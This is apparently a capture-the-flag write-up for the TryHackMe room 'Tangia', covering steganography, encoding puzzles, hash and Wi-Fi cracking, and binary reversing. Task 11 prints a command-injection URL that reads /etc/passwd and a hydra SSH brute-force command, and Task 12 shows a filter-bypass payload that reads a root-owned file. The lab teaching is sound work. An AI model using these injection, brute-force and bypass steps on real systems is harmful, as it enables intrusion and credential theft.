TryHackMe | Tangia (official write-up)

Hello guys it’s your boy ouranos , in this writeup i will solve the room tangia from try hack me .

so i’ll start by doing a quick nmap scan to see open ports :

sudo nmap -sS -sV $Your_IP

[Task 2] Tangia pot :

So the room start with a small challenge to warm up , the description refer to robots.txt

Here we got our directory :

in /tangia_pot we have some encoded data and we need to decode it using cyber chef

binnary → decimal → morse code → hex → base64

And we got our first flag

[Task 3] Ginger

This challenge give us some hints in the description that we will use in our research , so we start by downloading the challenge from ftp (login as anonymous)

ftp > get ginger.jpg

We start bruteforcing using stegseek to extract a file hidden inside

stegseek ginger.jpg

we found our paraphrase and a file so i’ll extract it using our paraphrase

steghide extract -sf ginger.jpg -p rockstar

now we extracted a file named “dakka_marrakchia” , it look like a song

this is a programming language called rockstar , i found an online interpreter who executed the script and gave me the flag

[Task 4] Meat

We need to connect to port 5000 to start the challenge , i connected using netcat

nc $your_machine_ip 5000

after analyzing the code you can see that there is a get function , so the app is vulnerable to buffer overflow and we can see that the buffer overflow at our access level

we just need to inject a ‘$’ (0x24 in hex) and we are at an admin access level and we got our flag

[Task 5] Olive oil

We start by downloading the challenge from http://$IP/olive

wget http://$yourmachineIP/olive

We have no extension so we run ‘file’ to know what the format of olive

file olive

its a jpg file , change the extension to jpg and run stegseek again

extract the note using steghide , in the note we have a directory who contain a png named punchcard.png who can be read using this site

This punch card lead us to another file

this file is without an extension , so we need to see his format using file

file flag

add a .zip extension to the file , when trying to extract the zip it ask us for a password , so we need to crack it (more infos in this blog )

download zip2john to get the hash

zip2john flag.zip > flag.hash

and now we crack the hash using john

john --wordlist=/usr/share/wordlists/rockyou.txt flag.hash

after we got the password we unzip the flag.zip

[Task 6] Preserved lemons

we have two js files in the page , cookies.js is a rabbit hole , script.js is our target

we see a const named k , it need to be decoded in cyber chef :

base64 →reverse →base64 →(get rid of the |) →decimal →url decoding

and we get rid of [] and submit it to win(the result) and we got the flag

[Task 7] Ghee

This challenge is so easy , download the ghee.cap and crack it with aircrack-ng

airmon-ng ghee.cap -w /usr/share/wordlists/rockyou.txt

that will take some time but it is what it is , just put the flag inside tangia{passwd}

[Task 8] Moroccan red gold

The cipher :

TTC CGA TCT TTT ATG CGA { TGC ACC GGT GCA _ ACC AGA _ GAG _ AGA ACT GGT ACA CCG GAG TCA GCA _ AGA AAA AGA ACA GCA TCC }

After some googling we found this Dna code that will help us decoding our flag

[Task 9] Garlic

Download an executable from this url http://$IP/door and give it some permissions

sudo chmod +x door

and start it

./door

the executable need a ping to give us the ingredient so we open the executable in ghidra and open the main function

and there we see a variable with a hex value (0x1368), after we convert it we got the ping

and that was our pin to unlock our executable

[Task 10] where

You just need to google this question to get the answer just don’t confuse it with the city

[Task 11] Farnatchi

We need our best farnatchi to help us , there is not a lot of clues in this challenge we need to inspect elements to see a js script who fetch an api

those comments gave us a good direction to use our friend google to help us , make in mind that this api is made using node

we found a cve and after reading it , we know that is an rce and we manually exploit the vulnerability with the get parameter , we can’t get a reverse shell and we can’t reflect the result of the command executed but we can execute things , and that’s where the ftp show up

command to execute : cat /etc/passwd > /var/ftp/passwd.txt

http://10.10.28.60:6969/api/services?get[]=$(cat%20/etc/passwd%20%3E%20/var/ftp/users.txt)

and go grab your result from ftp

get the users.txt and see the users

after we knew a username i’ll try to bruteforce the ssh

hydra -l *user* -P /usr/share/wordlists/rockyou.txt <IP> ssh

after a while we found that the bruteforce is done and we got the user password

login in ssh with the creds that you have

[Task 12] Mint tea

if you see your permissions ( sudo -l )you have permission to execute atay as root

so “atay.py” is a jail , there is a filter who won’t let you execute a lot of reading commands

to bypass this filter we will use double quotes and question marks

ca"t" /ro?t/??ay.?txt

this technique will help us bypass the python filter and execute in the command .

[The end]

Thank you for completing Tangia room i hope you loved it .

-0UR4N05